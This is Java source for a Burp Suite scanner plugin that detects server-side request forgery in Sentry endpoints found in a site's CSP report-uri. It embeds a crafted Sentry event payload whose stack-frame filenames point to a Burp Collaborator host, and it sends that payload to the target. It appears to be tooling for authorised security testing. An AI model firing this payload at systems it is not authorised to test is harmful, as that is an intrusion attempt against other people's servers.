package com.yandex.burp.extensions.plugins.audit;

import java.util.ArrayList;
import java.util.HashSet;
import java.util.List;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

import burp.IBurpCollaboratorClientContext;
import burp.IBurpCollaboratorInteraction;
import burp.IBurpExtenderCallbacks;
import burp.IExtensionHelpers;
import burp.IHttpRequestResponse;
import burp.IHttpService;
import burp.IRequestInfo;
import burp.IResponseInfo;
import burp.IScanIssue;
import burp.IScannerInsertionPoint;
import com.yandex.burp.extensions.plugins.CustomScanIssue;
import com.yandex.burp.extensions.plugins.Utils;
import com.yandex.burp.extensions.plugins.config.BurpMollyPackConfig;

/**
 * Created by shikari on 20/08/2019.
 */
public class SentrySSRFPlugin implements IAuditPlugin {

    private static final List<String> SSRFPayloads = new ArrayList<>();
    private static final List<String> ContentType = new ArrayList<>();
    private final int ISSUE_TYPE = 0x080a0016;
    private final String ISSUE_NAME = "Sentry SSRF Molly";
    private final String SEVERITY = "High";
    private final String CONFIDENCE = "Certain";
    private IBurpExtenderCallbacks callbacks;
    private IExtensionHelpers helpers;
    private HashSet<String> flags;

    public SentrySSRFPlugin(IBurpExtenderCallbacks callbacks, BurpMollyPackConfig extConfig) {
        this.callbacks = callbacks;
        this.helpers = callbacks.getHelpers();
        this.flags = new HashSet<>();
        initContentType();
        initSSRFPayloads();
    }

    private void initContentType() {
        //ContentType.add("Content-Type: application/x-www-form-urlencoded");
        //ContentType.add("Content-Type: application/csp-report");
        ContentType.add("Content-Type: application/json");
    }

    private static final Pattern CSPReportPattern = Pattern.compile("report-uri.(?<protocol>https?):\\/\\/(?<host>(?:[\\w-]+\\.)+?((yandex\\.(ru|com|com\\.tr|kz|ua|by|az|com\\.am|com\\.ge|co\\.il|kg|lt|lv|md|tj|tm|uz|fr|ee|net|st))|(ya\\.(ru))))(?<path>\\/api\\/([0-9]+)\\/(?:.\\w+)+?\\/\\?((.+)=(.+)&)?(sentry_key=(\\w{32}))[^;]*)(;|$)");
    //Regular for IP
    //private static final Pattern CSPReportPattern = Pattern.compile("report-uri.(?<protocol>https?):\\/\\/(?<host>(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]))(?<path>\\/api\\/([0-9]+)\\/(?:.\\w+)+?\\/\\?((.+)=(.+)&)?(sentry_key=(\\w{32}))[^;]*)(;|$)");

    public void initSSRFPayloads() {
        SSRFPayloads.add("{\"extra\":{\"component\":\"redux/actions/index\",\"action\":\"RegisterDeviceWeb\",\"__serialized__\":{\"code\":\"INVALID_CREDENTIALS\",\"message\":\"INVALID_CREDENTIALS \",\"details\":[]}},\"fingerprint\":[\"{{ default }}\",\"INVALID_CREDENTIALS \"],\"message\":\"Non-Error exception captured with keys: code, details, message\",\"stacktrace\":{\"frames\":[{\"colno\":220669,\"filename\":\"http://{collaboratorPayload}/\",\"function\":\"?\",\"in_app\":true,\"lineno\":1},{\"colno\":343191,\"filename\":\"http://{collaboratorPayload}/\",\"function\":\"Object._sentry_browser__WEBPACK_IMPORTED_MODULE_2__.capture\",\"in_app\":true,\"lineno\":1},{\"colno\":2916304,\"filename\":\"http://{collaboratorPayload}/\",\"function\":\"Object.t.withScope\",\"in_app\":true,\"lineno\":1},{\"colno\":2915683,\"filename\":\"http://{collaboratorPayload}/\",\"function\":\"o\",\"in_app\":true,\"lineno\":1},{\"colno\":2918355,\"filename\":\"http://{collaboratorPayload}/\",\"function\":\"e.withScope\",\"in_app\":true,\"lineno\":1},{\"colno\":343462,\"filename\":\"http://{collaboratorPayload}/\",\"function\":\"?\",\"in_app\":true,\"lineno\":1}]},\"exception\":{\"values\":[{\"value\":\"Custom Object\",\"type\":\"Error\"}],\"mechanism\":{\"handled\":true,\"type\":\"generic\"}},\"event_id\":\"1bb2bfa03c4e4bb196e927356a9cb76f\",\"platform\":\"javascript\",\"sdk\":{\"name\":\"sentry.javascript.browser\",\"packages\":[{\"name\":\"npm:@sentry/browser\",\"version\":\"4.6.4\"}],\"version\":\"4.6.4\"},\"release\":\"522bb199\",\"tags\":{\"errorCode\":\"INVALID_CREDENTIALS undefined\"},\"user\":{\"username\":\"c57f74902889d6257893939f9d8176ab11f5665d7a8674c29806fa1c1b7ea29a\"},\"breadcrumbs\":[{\"timestamp\":1554814517.038,\"category\":\"navigation\",\"data\":{\"from\":\"/\",\"to\":\"/login\"}},{\"timestamp\":1554814522.734,\"category\":\"ui.input\",\"message\":\"div.fBtQFC > input#loginPhoneNumber._12eSgU[type=\\\"tel\\\"]\"},{\"timestamp\":1554814523.938,\"category\":\"ui.click\",\"message\":\"button._3NdfgV._1ZU_Mm._1ohhal._2fetLI._1SF04O._1ODqu6[type=\\\"submit\\\"]\"}],\"request\":{\"url\":\"http://{collaboratorPayload}\",\"headers\":{\"User-Agent\":\"Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36\"}}}");
    }

    private String getPolicyFromHeader(IResponseInfo resp) {
        return Utils.getHeaderValue(resp, "Content-Security-Policy");
    }

    @Override
    public List<IScanIssue> doScan(IHttpRequestResponse baseRequestResponse, IScannerInsertionPoint insertionPoint) {
        IResponseInfo resp = helpers.analyzeResponse(baseRequestResponse.getResponse());
        IRequestInfo req = helpers.analyzeRequest(baseRequestResponse.getRequest());
        if (resp == null | req == null) return null;

        String hostUrl = baseRequestResponse.getHttpService().toString();
        if (flags.contains(hostUrl)) return null;
        else flags.add(hostUrl);

        IBurpCollaboratorClientContext collaboratorContext = callbacks.createBurpCollaboratorClientContext();
        String collaboratorPayload = collaboratorContext.generatePayload(true);
        List<IScanIssue> issues = new ArrayList<>();

        String policy = getPolicyFromHeader(resp);
        if (policy == null) return null;
        Matcher matcher = CSPReportPattern.matcher(policy);

        if (matcher.find()) {
            String sentry_host = matcher.group("host");
            String sentry_path = matcher.group("path");
            String sentry_protocol = matcher.group("protocol");
            for (String content_type : ContentType) {
                for (String ssrf : SSRFPayloads) {
                    ssrf = ssrf.replace("{collaboratorPayload}", collaboratorPayload);

                    IHttpService sentry_req = helpers.buildHttpService(sentry_host, 80, sentry_protocol);

                    /* XXX: WTF? */
                    List<String> headers = new ArrayList<>();
                    headers.add("POST " + sentry_path + " HTTP/1.1");
                    headers.add("Host: " + sentry_host);
                    headers.add("User-Agent: Molly");
                    headers.add(content_type);

                    byte[] attackBody = helpers.buildHttpMessage(headers, helpers.stringToBytes(ssrf));



                    IHttpRequestResponse attackRequestResponse = callbacks.makeHttpRequest(sentry_req, attackBody);
                    List<IBurpCollaboratorInteraction> collaboratorInteractions = collaboratorContext.fetchCollaboratorInteractionsFor(collaboratorPayload);

                    if (attackRequestResponse != null && attackRequestResponse.getResponse() != null
                            && collaboratorInteractions != null
                            && (!collaboratorInteractions.isEmpty())) {

                        String attackDetails = "Vulnerable to SSRF server is enabled at: " + helpers.analyzeRequest(attackRequestResponse).getUrl().toString() + "\n" +
                                "Via CSP report URI at: " + helpers.analyzeRequest(baseRequestResponse).getUrl().toString() + "\n" +
                                "Additional information: https://wiki.yandex-team.ru/security/for/developers/#ssrf\n" +
                                "CSP Headers: " + policy;

                        issues.add(new CustomScanIssue(attackRequestResponse.getHttpService(),
                                helpers.analyzeRequest(attackRequestResponse).getUrl(),
                                new IHttpRequestResponse[]{callbacks.applyMarkers(attackRequestResponse, null, null)},
                                attackDetails, ISSUE_TYPE, ISSUE_NAME, SEVERITY, CONFIDENCE,
                                "", "", ""));
                    }
                }
            }
        }
        return issues.isEmpty()?null:issues;
    }
}
